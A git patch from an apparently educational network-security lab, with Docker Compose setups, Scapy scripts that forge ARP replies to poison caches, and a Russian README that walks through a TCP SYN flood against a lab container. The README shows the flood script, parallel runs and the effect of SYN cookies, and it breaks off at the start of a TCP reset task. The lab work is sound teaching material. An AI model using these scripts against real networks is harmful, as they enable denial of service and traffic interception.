From eeebd25b5e0ca9ac29c96e83c6276ad22e769ed3 Mon Sep 17 00:00:00 2001 From: Marat Kharitonov Date: Mon, 4 Mar 2024 17:28:30 -0500 Subject: [PATCH] Lab1 only scripts; Lab2 full complete be4 redone --- .../01-tcpip/01-arp/docker-compose.yaml | 43 ++ .../01-network/01-tcpip/01-arp/volume/opt1.py | 17 + .../01-network/01-tcpip/01-arp/volume/opt2.py | 17 + .../01-network/01-tcpip/01-arp/volume/opt3.py | 17 + pentest/01-network/01-tcpip/02-tcp/README.md | 658 ++++++++++++++++++ .../01-tcpip/02-tcp/docker-compose.yaml | 57 ++ .../01-tcpip/02-tcp/img/image01.png | Bin 0 -> 49025 bytes .../01-network/01-tcpip/02-tcp/volume/opt1.py | 15 + .../01-network/01-tcpip/02-tcp/volume/opt2.py | 7 + .../01-network/01-tcpip/02-tcp/volume/opt3.py | 8 + 10 files changed, 839 insertions(+) create mode 100644 pentest/01-network/01-tcpip/01-arp/docker-compose.yaml create mode 100644 pentest/01-network/01-tcpip/01-arp/volume/opt1.py create mode 100644 pentest/01-network/01-tcpip/01-arp/volume/opt2.py create mode 100644 pentest/01-network/01-tcpip/01-arp/volume/opt3.py create mode 100644 pentest/01-network/01-tcpip/02-tcp/README.md create mode 100644 pentest/01-network/01-tcpip/02-tcp/docker-compose.yaml create mode 100644 pentest/01-network/01-tcpip/02-tcp/img/image01.png create mode 100755 pentest/01-network/01-tcpip/02-tcp/volume/opt1.py create mode 100755 pentest/01-network/01-tcpip/02-tcp/volume/opt2.py create mode 100755 pentest/01-network/01-tcpip/02-tcp/volume/opt3.py diff --git a/pentest/01-network/01-tcpip/01-arp/docker-compose.yaml b/pentest/01-network/01-tcpip/01-arp/docker-compose.yaml new file mode 100644 index 0000000..353aa86 --- /dev/null +++ b/pentest/01-network/01-tcpip/01-arp/docker-compose.yaml @@ -0,0 +1,43 @@ +version: "3" + +networks: + net-1: + name: net-1 + ipam: + config: + - subnet: 10.3.0.0/24 + +services: + HostA: + image: sb27/sf-lab1:latest + container_name: HostA + # tty: true + cap_add: + - ALL + networks: + net-1: + ipv4_address: 10.3.0.2 + + HostB: + image: sb27/sf-lab1:latest + container_name: HostB + # tty: true + cap_add: + - ALL + networks: + net-1: + ipv4_address: 10.3.0.3 + + HostM: + image: sb27/sf-lab1:latest + container_name: HostM + # tty: true + cap_add: + - ALL + privileged: true + volumes: + - ./volume:/volume + networks: + net-1: + ipv4_address: 10.3.0.37 + diff --git a/pentest/01-network/01-tcpip/01-arp/volume/opt1.py b/pentest/01-network/01-tcpip/01-arp/volume/opt1.py new file mode 100644 index 0000000..d38d12c --- /dev/null +++ b/pentest/01-network/01-tcpip/01-arp/volume/opt1.py @@ -0,0 +1,17 @@ +#!/usr/bin/python3 +from scapy.all import * + +A_ip = "10.3.0.2" +A_mac = "02:42:0a:03:00:02" +B_ip = "10.3.0.3" +B_mac = "02:42:0a:03:00:03" +M_ip = "10.3.0.37" +M_mac = "02:42:0a:03:00:25" + +eth = Ether(src=M_mac,dst='ff:ff:ff:ff:ff:ff') +arp = ARP(hwsrc=M_mac, psrc=B_ip, + hwdst=A_mac, pdst=A_ip, + op=1) + +pkt = eth / arp +sendp(pkt) \ No newline at end of file diff --git a/pentest/01-network/01-tcpip/01-arp/volume/opt2.py b/pentest/01-network/01-tcpip/01-arp/volume/opt2.py new file mode 100644 index 0000000..49020db --- /dev/null +++ b/pentest/01-network/01-tcpip/01-arp/volume/opt2.py @@ -0,0 +1,17 @@ +#!/usr/bin/python3 +from scapy.all import * + +A_ip = "10.3.0.2" +A_mac = "02:42:0a:03:00:02" +B_ip = "10.3.0.3" +B_mac = "02:42:0a:03:00:03" +M_ip = "10.3.0.37" +M_mac = "02:42:0a:03:00:25" + +eth = Ether(src=M_mac,dst=A_mac) +arp = ARP(hwsrc=M_mac, psrc=B_ip, + hwdst=A_mac, pdst=A_ip, + op=2) + +pkt = eth / arp +sendp(pkt) \ No newline at end of file diff --git a/pentest/01-network/01-tcpip/01-arp/volume/opt3.py b/pentest/01-network/01-tcpip/01-arp/volume/opt3.py new file mode 100644 index 0000000..2df179a --- /dev/null +++ b/pentest/01-network/01-tcpip/01-arp/volume/opt3.py @@ -0,0 +1,17 @@ +#!/usr/bin/python3 +from scapy.all import * + +A_ip = "10.3.0.2" +A_mac = "02:42:0a:03:00:02" +B_ip = "10.3.0.3" +B_mac = "02:42:0a:03:00:03" +M_ip = "10.3.0.37" +M_mac = "02:42:0a:03:00:25" + +eth = Ether(src=M_mac,dst='ff:ff:ff:ff:ff:ff') +arp = ARP(hwsrc=M_mac, psrc=B_ip, + hwdst='ff:ff:ff:ff:ff:ff', pdst=B_ip, + op=1) + +pkt = eth / arp +sendp(pkt) \ No newline at end of file diff --git a/pentest/01-network/01-tcpip/02-tcp/README.md b/pentest/01-network/01-tcpip/02-tcp/README.md new file mode 100644 index 0000000..12fa929 --- /dev/null +++ b/pentest/01-network/01-tcpip/02-tcp/README.md @@ -0,0 +1,658 @@ +# Домашняя работа № 2 по предмету: «Безопасность вычислительных сетей» +## Описание лабораторной работы +Цель лабораторной работы — получить непосредственный опыт работы с уязвимостями, а также с атаками на эти уязвимости. + +В этой лабораторной работе вы проведете несколько атак на TCP: + +1. TCP SYN flood attack, and SYN cookies; +2. TCP reset attack; +3. TCP session hijacking attack. + +В лабораторной работе четыре контейнера: три машины легитимных пользователей и одна машина атакующего. +![Lab Stand](img/image01.png) + +## Задача 1 «TCP SYN flood attack». +` +Код отправляет поддельные пакеты TCP SYN со случайно сгенерированным исходным IP-адресом, исходным портом и порядковым номером. +Подождите хотя бы одну минуту, а затем попытайтесь подключиться к жертве с помощью Telnet. Получится ли у вас добиться успеха? Подключиться можно через хост машины Victim (все дальнейшие проверки следует проводить через нее). +` + +Python-скрипт для атаки: +```python +#!/usr/bin/python3 + +from scapy.all import IP, TCP, send +from ipaddress import IPv4Address +from random import getrandbits + +ip = IP(dst="10.3.0.4") +tcp = TCP(dport=23, flags='S') +pkt = ip/tcp + +while True: + pkt[IP].src = str(IPv4Address(getrandbits(32))) + pkt[TCP].sport = getrandbits(16) + pkt[TCP].seq = getrandbits(32) + send(pkt, iface = 'eth0', verbose = 0) + +``` + +### Задача 1.1 +`net.ipv4.tcp_syncookies=0` - SYN Cookies на жертве (Victim) отключены. + +#### Выполнение задачи: + +1. Запустим скрипт на `seed-attacker` и посмотрим наличие подключений на `Victim`. + +Листинг `seed-attacker`: + +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it seed-attacker /bin/bash + +root@7552dc4712a7:/# ./volume/opt1.py +``` +Листинг `Victim`: +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it Victim /bin/bash +root@c1ce515eff6f:/# ss -t4a +State Recv-Q Send-Q Local Address:Port Peer Address:Port Process +LISTEN 0 4096 127.0.0.11:36247 0.0.0.0:* +LISTEN 0 128 0.0.0.0:telnet 0.0.0.0:* +SYN-RECV 0 0 10.3.0.4:telnet 158.3.195.40:63498 +SYN-RECV 0 0 10.3.0.4:telnet 68.112.126.190:38173 +SYN-RECV 0 0 10.3.0.4:telnet 35.165.229.103:19782 +SYN-RECV 0 0 10.3.0.4:telnet 223.152.125.135:15332 +SYN-RECV 0 0 10.3.0.4:telnet 61.203.9.143:15695 +SYN-RECV 0 0 10.3.0.4:telnet 255.206.99.32:60814 +SYN-RECV 0 0 10.3.0.4:telnet 170.124.119.247:26556 +SYN-RECV 0 0 10.3.0.4:telnet 52.3.217.249:9740 +SYN-RECV 0 0 10.3.0.4:telnet 164.232.55.253:12359 +SYN-RECV 0 0 10.3.0.4:telnet 241.193.45.30:30514 +SYN-RECV 0 0 10.3.0.4:telnet 142.136.178.68:48908 +SYN-RECV 0 0 10.3.0.4:telnet 169.127.7.200:28752 +SYN-RECV 0 0 10.3.0.4:telnet 164.46.133.1:51723 +SYN-RECV 0 0 10.3.0.4:telnet 30.31.252.194:25101 +SYN-RECV 0 0 10.3.0.4:telnet 128.80.132.146:47391 +SYN-RECV 0 0 10.3.0.4:telnet 212.103.101.22:46695 +SYN-RECV 0 0 10.3.0.4:telnet 168.126.69.223:2779 +SYN-RECV 0 0 10.3.0.4:telnet 106.227.225.114:40267 +SYN-RECV 0 0 10.3.0.4:telnet 205.30.153.72:63313 +SYN-RECV 0 0 10.3.0.4:telnet 182.37.132.171:9133 +SYN-RECV 0 0 10.3.0.4:telnet 193.129.141.24:27999 +SYN-RECV 0 0 10.3.0.4:telnet 105.70.138.201:52946 +SYN-RECV 0 0 10.3.0.4:telnet 85.161.8.71:23835 +SYN-RECV 0 0 10.3.0.4:telnet 172.101.184.243:63721 +SYN-RECV 0 0 10.3.0.4:telnet 113.162.77.216:42567 +SYN-RECV 0 0 10.3.0.4:telnet 124.15.77.255:47959 +SYN-RECV 0 0 10.3.0.4:telnet 71.74.115.95:61061 +SYN-RECV 0 0 10.3.0.4:telnet 244.169.200.1:28506 +SYN-RECV 0 0 10.3.0.4:telnet 43.185.198.71:10477 +SYN-RECV 0 0 10.3.0.4:telnet 6.153.18.179:64006 +SYN-RECV 0 0 10.3.0.4:telnet 91.3.85.152:38253 +SYN-RECV 0 0 10.3.0.4:telnet 12.174.198.73:15419 +SYN-RECV 0 0 10.3.0.4:telnet 32.79.155.173:33205 +SYN-RECV 0 0 10.3.0.4:telnet 206.9.216.119:25906 +SYN-RECV 0 0 10.3.0.4:telnet 174.214.52.195:53607 +SYN-RECV 0 0 10.3.0.4:telnet 162.128.57.123:19642 +SYN-RECV 0 0 10.3.0.4:telnet 85.47.254.100:57247 +SYN-RECV 0 0 10.3.0.4:telnet 110.163.192.5:25076 +SYN-RECV 0 0 10.3.0.4:telnet 158.21.174.242:50213 +SYN-RECV 0 0 10.3.0.4:telnet 28.127.92.138:23754 +SYN-RECV 0 0 10.3.0.4:telnet 128.14.169.102:17831 +SYN-RECV 0 0 10.3.0.4:telnet 182.54.130.73:33873 +SYN-RECV 0 0 10.3.0.4:telnet 140.248.111.171:957 +SYN-RECV 0 0 10.3.0.4:telnet 28.155.173.107:475 +SYN-RECV 0 0 10.3.0.4:telnet 170.77.97.244:26726 +SYN-RECV 0 0 10.3.0.4:telnet 190.143.212.253:132 +SYN-RECV 0 0 10.3.0.4:telnet 155.227.189.26:40335 +SYN-RECV 0 0 10.3.0.4:telnet 72.225.114.86:38447 +SYN-RECV 0 0 10.3.0.4:telnet 60.96.3.80:27168 +SYN-RECV 0 0 10.3.0.4:telnet 142.187.166.211:33573 +SYN-RECV 0 0 10.3.0.4:telnet 65.12.78.96:26432 +SYN-RECV 0 0 10.3.0.4:telnet 118.217.175.101:58536 +SYN-RECV 0 0 10.3.0.4:telnet 34.60.246.132:38453 +SYN-RECV 0 0 10.3.0.4:telnet 43.227.33.66:19153 +SYN-RECV 0 0 10.3.0.4:telnet 222.220.229.204:12038 +SYN-RECV 0 0 10.3.0.4:telnet 149.39.221.94:41871 +SYN-RECV 0 0 10.3.0.4:telnet 35.153.15.193:23372 +SYN-RECV 0 0 10.3.0.4:telnet 144.41.43.28:6615 +SYN-RECV 0 0 10.3.0.4:telnet 90.199.83.251:42295 +SYN-RECV 0 0 10.3.0.4:telnet 74.115.119.245:36185 +SYN-RECV 0 0 10.3.0.4:telnet 222.179.99.248:7329 +SYN-RECV 0 0 10.3.0.4:telnet 188.221.77.103:59499 +SYN-RECV 0 0 10.3.0.4:telnet 120.30.189.201:42384 +SYN-RECV 0 0 10.3.0.4:telnet 116.109.255.44:63489 +SYN-RECV 0 0 10.3.0.4:telnet 184.48.224.156:25463 +SYN-RECV 0 0 10.3.0.4:telnet 101.9.97.29:6589 +SYN-RECV 0 0 10.3.0.4:telnet 88.124.93.154:10414 +SYN-RECV 0 0 10.3.0.4:telnet 57.169.50.152:38671 +SYN-RECV 0 0 10.3.0.4:telnet 9.182.150.232:65338 +SYN-RECV 0 0 10.3.0.4:telnet 41.10.253.44:46509 +SYN-RECV 0 0 10.3.0.4:telnet 162.133.50.166:36175 +SYN-RECV 0 0 10.3.0.4:telnet 59.238.207.201:5967 +SYN-RECV 0 0 10.3.0.4:telnet 11.111.229.68:57707 +SYN-RECV 0 0 10.3.0.4:telnet 244.194.124.160:40218 +SYN-RECV 0 0 10.3.0.4:telnet 83.29.237.183:3989 +SYN-RECV 0 0 10.3.0.4:telnet 101.64.206.92:51178 +SYN-RECV 0 0 10.3.0.4:telnet 177.23.166.58:12932 +SYN-RECV 0 0 10.3.0.4:telnet 89.15.11.238:13961 +SYN-RECV 0 0 10.3.0.4:telnet 212.64.194.218:21478 +SYN-RECV 0 0 10.3.0.4:telnet 163.218.76.207:26101 +SYN-RECV 0 0 10.3.0.4:telnet 188.132.173.32:31742 +SYN-RECV 0 0 10.3.0.4:telnet 4.63.123.81:47630 +SYN-RECV 0 0 10.3.0.4:telnet 113.116.81.171:5453 +SYN-RECV 0 0 10.3.0.4:telnet 255.72.111.137:52032 +SYN-RECV 0 0 10.3.0.4:telnet 36.198.2.211:65472 +SYN-RECV 0 0 10.3.0.4:telnet 247.162.128.86:11958 +SYN-RECV 0 0 10.3.0.4:telnet 62.75.93.58:9085 +SYN-RECV 0 0 10.3.0.4:telnet 105.192.66.155:18524 +SYN-RECV 0 0 10.3.0.4:telnet 83.205.134.50:18579 +SYN-RECV 0 0 10.3.0.4:telnet 100.75.229.233:40304 +SYN-RECV 0 0 10.3.0.4:telnet 249.109.36.201:36192 +SYN-RECV 0 0 10.3.0.4:telnet 206.180.21.66:59312 +SYN-RECV 0 0 10.3.0.4:telnet 10.128.83.150:17815 +SYN-RECV 0 0 10.3.0.4:telnet 145.34.175.51:4006 +SYN-RECV 0 0 10.3.0.4:telnet 153.240.241.137:33534 +SYN-RECV 0 0 10.3.0.4:telnet 108.254.65.200:37901 +SYN-RECV 0 0 10.3.0.4:telnet 221.225.89.253:36264 +SYN-RECV 0 0 10.3.0.4:telnet 118.232.151.247:8717 +SYN-RECV 0 0 10.3.0.4:telnet 201.41.203.96:56927 +SYN-RECV 0 0 10.3.0.4:telnet 67.142.179.214:37394 +SYN-RECV 0 0 10.3.0.4:telnet 208.107.192.91:36944 +SYN-RECV 0 0 10.3.0.4:telnet 211.227.162.197:3944 +SYN-RECV 0 0 10.3.0.4:telnet 188.223.177.201:40671 +SYN-RECV 0 0 10.3.0.4:telnet 78.135.247.222:17643 +SYN-RECV 0 0 10.3.0.4:telnet 108.83.96.3:2852 +SYN-RECV 0 0 10.3.0.4:telnet 142.213.104.206:29514 +SYN-RECV 0 0 10.3.0.4:telnet 160.145.50.39:50538 +SYN-RECV 0 0 10.3.0.4:telnet 161.152.196.165:4955 +SYN-RECV 0 0 10.3.0.4:telnet 241.166.228.192:60093 +SYN-RECV 0 0 10.3.0.4:telnet 80.6.1.157:43426 +SYN-RECV 0 0 10.3.0.4:telnet 240.101.37.241:58135 +SYN-RECV 0 0 10.3.0.4:telnet 16.76.239.128:21463 +SYN-RECV 0 0 10.3.0.4:telnet 193.32.104.199:19927 +SYN-RECV 0 0 10.3.0.4:telnet 45.41.161.117:9061 +SYN-RECV 0 0 10.3.0.4:telnet 141.6.97.30:49660 +SYN-RECV 0 0 10.3.0.4:telnet 132.232.6.19:2651 +SYN-RECV 0 0 10.3.0.4:telnet 105.60.200.215:21117 +SYN-RECV 0 0 10.3.0.4:telnet 47.151.76.132:38787 +SYN-RECV 0 0 10.3.0.4:telnet 243.62.126.231:28478 +SYN-RECV 0 0 10.3.0.4:telnet 118.246.71.121:31682 +SYN-RECV 0 0 10.3.0.4:telnet 194.220.80.110:29664 +SYN-RECV 0 0 10.3.0.4:telnet 66.253.232.91:32490 +SYN-RECV 0 0 10.3.0.4:telnet 61.229.49.119:49516 +SYN-RECV 0 0 10.3.0.4:telnet 120.235.163.180:50010 +SYN-RECV 0 0 10.3.0.4:telnet 89.60.103.203:54792 +SYN-RECV 0 0 10.3.0.4:telnet 32.207.129.235:912 +SYN-RECV 0 0 10.3.0.4:telnet 39.5.255.223:59359 +SYN-RECV 0 0 10.3.0.4:telnet 104.113.33.147:63898 +``` + +2. Проверим возможность подключения к `Victim` с `HostB` +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it HostB telnet Victim +Trying 10.3.0.4... +Connected to Victim. +Escape character is '^]'. +Ubuntu 20.04.1 LTS +c1ce515eff6f login: +``` +В данном случае, мы видим успешный вывод приглашения. Можно предположить, что атака не удалась, но зная, что возможности очереди машины зависят от её характеристик, не будет лишним попробовать запустить сразу несколько экземпляров скрипта на `seed-attacker` добавив операнд `&` к команде запуска: + +`root@7552dc4712a7:/# ./volume/opt1.py &` + +3. Запустим 15 экземпляров скрипта одновременно и проверим возможность подключения: + +```bash +root@7552dc4712a7:/# ./volume/opt1.py & +[1] 40 +root@7552dc4712a7:/# ./volume/opt1.py & +[2] 44 +root@7552dc4712a7:/# ./volume/opt1.py & +[3] 48 +root@7552dc4712a7:/# ./volume/opt1.py & +[4] 52 +root@7552dc4712a7:/# ./volume/opt1.py & +[5] 56 +root@7552dc4712a7:/# ./volume/opt1.py & +[6] 60 +root@7552dc4712a7:/# ./volume/opt1.py & +[7] 64 +root@7552dc4712a7:/# ./volume/opt1.py & +[8] 68 +root@7552dc4712a7:/# ./volume/opt1.py & +[9] 72 +root@7552dc4712a7:/# ./volume/opt1.py & +[10] 76 +root@7552dc4712a7:/# ./volume/opt1.py & +[11] 80 +root@7552dc4712a7:/# ./volume/opt1.py & +[12] 84 +root@7552dc4712a7:/# ./volume/opt1.py & +[13] 88 +root@7552dc4712a7:/# ./volume/opt1.py & +[14] 92 +root@7552dc4712a7:/# ./volume/opt1.py & +[15] 96 +``` +4. Подключение выполняется, но с большими задержками (от 10 до 30 секунд). Атаку можно считать успешной. + +#### Итог задачи 1.1 +Атака при `net.ipv4.tcp_syncookies=0` производится **успешно**! + +### Задача 1.2 + +`net.ipv4.tcp_syncookies=1` - SYN Cookies на жертве (Victim) включены. + +Время провести попытку с включенным механизмом syncookies. Для этого пересоздадим контейнер `Victim` установив значение строки `net.ipv4.tcp_syncookies=1` в docker-compose.yaml + +```bash +┌──(marker㉿kali)-[~/…/pentest/01-network/01-tcpip/02-tcp] +└─$ docker-compose up -d +HostB is up-to-date +HostA is up-to-date +seed-attacker is up-to-date +Recreating Victim ... done +``` +#### Выполнение задачи + +1. Так как мы пересоздали только контейнер `Victim` необходимости перезапускать скрипты нет, можно убедиться только в наличии подключений на `Victim` + +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it Victim ss -t4a +State Recv-Q Send-Q Local Address:Port Peer Address:Port Process +LISTEN 0 4096 127.0.0.11:40647 0.0.0.0:* +LISTEN 0 128 0.0.0.0:telnet 0.0.0.0:* +SYN-RECV 0 0 10.3.0.4:telnet 108.27.226.102:5104 +SYN-RECV 0 0 10.3.0.4:telnet 73.160.236.206:6860 +SYN-RECV 0 0 10.3.0.4:telnet 1.25.214.186:57581 +SYN-RECV 0 0 10.3.0.4:telnet 195.108.61.207:19857 +SYN-RECV 0 0 10.3.0.4:telnet 58.175.239.163:46032 +SYN-RECV 0 0 10.3.0.4:telnet 65.125.87.11:39861 +SYN-RECV 0 0 10.3.0.4:telnet 66.48.143.8:54418 +SYN-RECV 0 0 10.3.0.4:telnet 103.157.54.82:63169 +SYN-RECV 0 0 10.3.0.4:telnet 21.208.194.188:23330 +SYN-RECV 0 0 10.3.0.4:telnet 168.107.191.96:38867 +SYN-RECV 0 0 10.3.0.4:telnet 138.53.84.222:9522 +SYN-RECV 0 0 10.3.0.4:telnet 23.239.108.253:57752 +SYN-RECV 0 0 10.3.0.4:telnet 207.255.101.226:42752 +SYN-RECV 0 0 10.3.0.4:telnet 31.98.248.252:54624 +SYN-RECV 0 0 10.3.0.4:telnet 153.149.254.217:57045 +SYN-RECV 0 0 10.3.0.4:telnet 110.90.139.107:45601 +SYN-RECV 0 0 10.3.0.4:telnet 63.215.107.84:61401 +SYN-RECV 0 0 10.3.0.4:telnet 30.192.12.91:48795 +SYN-RECV 0 0 10.3.0.4:telnet 160.28.246.103:36530 +SYN-RECV 0 0 10.3.0.4:telnet 173.14.71.55:22736 +SYN-RECV 0 0 10.3.0.4:telnet 2.147.136.249:60366 +SYN-RECV 0 0 10.3.0.4:telnet 128.143.50.25:31526 +SYN-RECV 0 0 10.3.0.4:telnet 18.245.103.194:58594 +SYN-RECV 0 0 10.3.0.4:telnet 199.55.89.215:12389 +SYN-RECV 0 0 10.3.0.4:telnet 75.87.156.253:2150 +SYN-RECV 0 0 10.3.0.4:telnet 36.125.204.38:40431 +SYN-RECV 0 0 10.3.0.4:telnet 29.174.150.228:3279 +SYN-RECV 0 0 10.3.0.4:telnet 103.182.14.81:8287 +SYN-RECV 0 0 10.3.0.4:telnet 7.195.187.110:42890 +SYN-RECV 0 0 10.3.0.4:telnet 48.112.154.154:27219 +SYN-RECV 0 0 10.3.0.4:telnet 24.19.187.21:43326 +SYN-RECV 0 0 10.3.0.4:telnet 21.175.158.40:28366 +SYN-RECV 0 0 10.3.0.4:telnet 164.210.118.69:60534 +SYN-RECV 0 0 10.3.0.4:telnet 34.42.220.155:58476 +SYN-RECV 0 0 10.3.0.4:telnet 213.180.124.2:49861 +SYN-RECV 0 0 10.3.0.4:telnet 103.11.249.237:56808 +SYN-RECV 0 0 10.3.0.4:telnet 120.247.60.217:4743 +SYN-RECV 0 0 10.3.0.4:telnet 218.226.80.53:34253 +SYN-RECV 0 0 10.3.0.4:telnet 42.145.114.221:49653 +SYN-RECV 0 0 10.3.0.4:telnet 7.240.255.81:27771 +SYN-RECV 0 0 10.3.0.4:telnet 143.58.200.245:33149 +SYN-RECV 0 0 10.3.0.4:telnet 69.34.181.160:5278 +SYN-RECV 0 0 10.3.0.4:telnet 213.61.103.79:44805 +SYN-RECV 0 0 10.3.0.4:telnet 158.80.85.163:17839 +SYN-RECV 0 0 10.3.0.4:telnet 166.43.252.1:35071 +SYN-RECV 0 0 10.3.0.4:telnet 108.96.192.139:9072 +SYN-RECV 0 0 10.3.0.4:telnet 5.21.112.104:21394 +SYN-RECV 0 0 10.3.0.4:telnet 162.25.70.105:60609 +SYN-RECV 0 0 10.3.0.4:telnet 80.161.149.89:23925 +SYN-RECV 0 0 10.3.0.4:telnet 141.38.182.231:3744 +SYN-RECV 0 0 10.3.0.4:telnet 95.234.149.125:251 +SYN-RECV 0 0 10.3.0.4:telnet 217.225.241.180:59771 +SYN-RECV 0 0 10.3.0.4:telnet 146.229.210.242:43953 +SYN-RECV 0 0 10.3.0.4:telnet 154.195.122.28:18065 +SYN-RECV 0 0 10.3.0.4:telnet 181.238.166.233:11863 +SYN-RECV 0 0 10.3.0.4:telnet 167.90.141.48:25317 +SYN-RECV 0 0 10.3.0.4:telnet 39.193.36.206:14815 +SYN-RECV 0 0 10.3.0.4:telnet 44.45.173.240:6168 +SYN-RECV 0 0 10.3.0.4:telnet 111.145.48.231:22391 +SYN-RECV 0 0 10.3.0.4:telnet 92.7.156.199:24283 +SYN-RECV 0 0 10.3.0.4:telnet 109.88.74.126:41634 +SYN-RECV 0 0 10.3.0.4:telnet 88.83.198.125:13924 +SYN-RECV 0 0 10.3.0.4:telnet 216.128.126.5:56934 +SYN-RECV 0 0 10.3.0.4:telnet 173.71.112.248:3183 +SYN-RECV 0 0 10.3.0.4:telnet 151.101.172.76:11086 +SYN-RECV 0 0 10.3.0.4:telnet 42.189.187.110:42000 +SYN-RECV 0 0 10.3.0.4:telnet 72.85.104.196:8777 +SYN-RECV 0 0 10.3.0.4:telnet 115.140.156.34:12861 +SYN-RECV 0 0 10.3.0.4:telnet 94.138.192.212:47483 +SYN-RECV 0 0 10.3.0.4:telnet 137.246.29.219:28520 +SYN-RECV 0 0 10.3.0.4:telnet 246.25.91.6:18763 +SYN-RECV 0 0 10.3.0.4:telnet 126.160.117.95:36546 +SYN-RECV 0 0 10.3.0.4:telnet 90.97.71.218:55907 +SYN-RECV 0 0 10.3.0.4:telnet 59.158.190.243:41916 +SYN-RECV 0 0 10.3.0.4:telnet 99.36.72.222:20953 +SYN-RECV 0 0 10.3.0.4:telnet 41.251.20.154:24466 +SYN-RECV 0 0 10.3.0.4:telnet 3.3.15.105:39580 +SYN-RECV 0 0 10.3.0.4:telnet 155.19.51.115:31768 +SYN-RECV 0 0 10.3.0.4:telnet 201.32.112.228:37389 +SYN-RECV 0 0 10.3.0.4:telnet 109.168.237.66:7420 +SYN-RECV 0 0 10.3.0.4:telnet 153.89.8.208:50018 +SYN-RECV 0 0 10.3.0.4:telnet 83.235.84.0:20745 +SYN-RECV 0 0 10.3.0.4:telnet 72.39.57.159:13316 +SYN-RECV 0 0 10.3.0.4:telnet 200.117.234.28:28479 +SYN-RECV 0 0 10.3.0.4:telnet 59.49.246.45:60117 +SYN-RECV 0 0 10.3.0.4:telnet 208.51.26.83:28652 +SYN-RECV 0 0 10.3.0.4:telnet 5.84.41.41:23684 +SYN-RECV 0 0 10.3.0.4:telnet 240.98.74.178:30076 +SYN-RECV 0 0 10.3.0.4:telnet 192.205.144.26:55242 +SYN-RECV 0 0 10.3.0.4:telnet 218.56.164.34:30890 +SYN-RECV 0 0 10.3.0.4:telnet 18.73.28.181:1097 +SYN-RECV 0 0 10.3.0.4:telnet 8.32.26.66:58232 +SYN-RECV 0 0 10.3.0.4:telnet 27.247.195.32:3246 +SYN-RECV 0 0 10.3.0.4:telnet 67.76.249.89:36674 +SYN-RECV 0 0 10.3.0.4:telnet 183.232.155.249:34478 +SYN-RECV 0 0 10.3.0.4:telnet 27.86.84.54:29173 +SYN-RECV 0 0 10.3.0.4:telnet 138.165.85.141:17408 +SYN-RECV 0 0 10.3.0.4:telnet 116.21.101.61:45236 +SYN-RECV 0 0 10.3.0.4:telnet 175.44.125.225:466 +SYN-RECV 0 0 10.3.0.4:telnet 216.66.253.9:26636 +SYN-RECV 0 0 10.3.0.4:telnet 59.108.99.169:30039 +SYN-RECV 0 0 10.3.0.4:telnet 39.85.136.219:37845 +SYN-RECV 0 0 10.3.0.4:telnet 48.0.195.61:20322 +SYN-RECV 0 0 10.3.0.4:telnet 29.51.136.15:37360 +SYN-RECV 0 0 10.3.0.4:telnet 109.45.185.107:64550 +SYN-RECV 0 0 10.3.0.4:telnet 212.126.191.57:53052 +SYN-RECV 0 0 10.3.0.4:telnet 215.189.234.143:41317 +SYN-RECV 0 0 10.3.0.4:telnet 109.203.202.22:26954 +SYN-RECV 0 0 10.3.0.4:telnet 93.249.23.245:675 +SYN-RECV 0 0 10.3.0.4:telnet 196.92.153.45:42899 +SYN-RECV 0 0 10.3.0.4:telnet 89.95.77.50:19402 +SYN-RECV 0 0 10.3.0.4:telnet 72.108.205.97:41939 +SYN-RECV 0 0 10.3.0.4:telnet 18.86.157.171:56327 +SYN-RECV 0 0 10.3.0.4:telnet 207.92.81.59:43164 +SYN-RECV 0 0 10.3.0.4:telnet 65.224.35.250:22195 +SYN-RECV 0 0 10.3.0.4:telnet 155.38.175.253:62408 +SYN-RECV 0 0 10.3.0.4:telnet 31.97.126.171:8731 +SYN-RECV 0 0 10.3.0.4:telnet 130.73.216.158:54260 +SYN-RECV 0 0 10.3.0.4:telnet 159.178.81.125:58782 +SYN-RECV 0 0 10.3.0.4:telnet 80.43.110.182:15577 +SYN-RECV 0 0 10.3.0.4:telnet 41.204.143.205:57513 +SYN-RECV 0 0 10.3.0.4:telnet 39.206.85.139:8549 +SYN-RECV 0 0 10.3.0.4:telnet 43.223.132.191:10875 +SYN-RECV 0 0 10.3.0.4:telnet 204.26.154.217:64975 +``` + +2. Подключения на месте. Проверим возможность подключения по Telnet. +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it HostB telnet Victim +Trying 10.3.0.4... +Connected to Victim. +Escape character is '^]'. +Ubuntu 20.04.1 LTS +6796bc79f91e login: ^X^CConnection closed by foreign host. + +┌──(marker㉿kali)-[~] +└─$ docker exec -it HostB telnet Victim +Trying 10.3.0.4... +Connected to Victim. +Escape character is '^]'. +Ubuntu 20.04.1 LTS +6796bc79f91e login: ^CConnection closed by foreign host. + +┌──(marker㉿kali)-[~] +└─$ docker exec -it HostB telnet Victim +Trying 10.3.0.4... +Connected to Victim. +Escape character is '^]'. +Ubuntu 20.04.1 LTS +6796bc79f91e login: ^CConnection closed by foreign host. + +┌──(marker㉿kali)-[~] +└─$ docker exec -it HostB telnet Victim +Trying 10.3.0.4... +Connected to Victim. +Escape character is '^]'. +Ubuntu 20.04.1 LTS +6796bc79f91e login: ^CConnection closed by foreign host. +``` +Проведя 4 попытки подключения и мгновенно увидев баннер Telnet можем сделать вывод, что в этот раз атака не удалась. + +#### Итог задачи 1.1 +Атака при `net.ipv4.tcp_syncookies=1` производится **неудачно**. + +### Итог задачи 1. + +Механизм TCP SYN cookies позволяет серверу генерировать специальные сокращенные версии TCP-заголовков (cookies) в ответ на входящие запросы SYN, сохраняя минимум информации о соединении. Когда сервер получает подтверждение от клиента (ACK-пакет), он может восстановить полную информацию о соединении из сокращенной версии TCP-заголовка, инициированной в SYN-пакете. + +Этот механизм позволяет серверу обрабатывать и отвечать на большое количество входящих соединений даже в условиях атаки SYN flood, так как он не хранит информацию о незавершенных соединениях в памяти, а использует специальные cookie для отслеживания состояния соединения. + +TCP SYN cookies - это один из методов защиты от атак на уровне TCP, который повышает устойчивость серверов к подобным атакам и обеспечивает непрерывность работы сетевых служб. + +## Задача 2. TCP reset attack + +1. Для выполнения атаки нам необходимо получить вводные данные. Для этого в момент подключения с `HostB` к `Victim` будем слушать трафик между ними с помощью `tcpdump` + +Выполняем подключение с `HostB` к `Victim` + +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it HostB telnet Victim +Trying 10.3.0.4... +Connected to Victim. +Escape 